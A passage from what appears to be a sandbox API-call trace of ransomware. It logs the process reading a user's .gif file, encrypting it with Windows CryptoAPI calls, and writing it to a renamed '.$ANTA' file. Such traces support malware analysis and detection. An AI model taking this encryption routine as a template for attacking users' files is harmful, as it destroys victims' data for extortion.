returned 0x43e2ae0 [0129.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797128 [0129.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0129.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0129.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0129.792] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0129.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0129.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0129.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0129.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0129.792] CryptDestroyHash (hHash=0x41ac200) returned 1 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0129.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0129.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0129.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0129.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0129.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0129.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0129.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0129.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0129.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0129.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0129.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0129.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0129.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0129.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0129.797] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5n nlgcucjhlr.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0129.797] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.797] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0129.797] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0129.797] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5n nlgcucjhlr.gif.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0129.801] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0129.801] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0xf43e, lpOverlapped=0x0) returned 1 [0129.804] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0129.807] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0129.807] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0129.807] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0129.807] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.807] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0129.808] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e29f0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e29f0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0129.808] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0129.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb1b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0129.808] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xf43e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xf440) returned 1 [0129.809] CharLowerBuffW (in: lpsz="byte[62529]", cchLength=0xb | out: lpsz="byte[62529]") returned 0xb [0129.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0129.809] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49d7ce8*, pdwDataLen=0x144e538*=0xf43e, dwBufLen=0xf440 | out: pbData=0x49d7ce8*, pdwDataLen=0x144e538*=0xf440) returned 1 [0129.809] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.870] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.870] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0xf440, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0xf440, lpOverlapped=0x0) returned 1 [0129.872] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0129.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.873] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0129.873] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0129.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0129.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0129.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0129.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0129.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0129.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.874] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0129.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0129.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0129.875] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0129.875] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0129.875] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0129.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.875] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0129.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0129.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0129.876] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae08 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae38 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf10 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0129.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 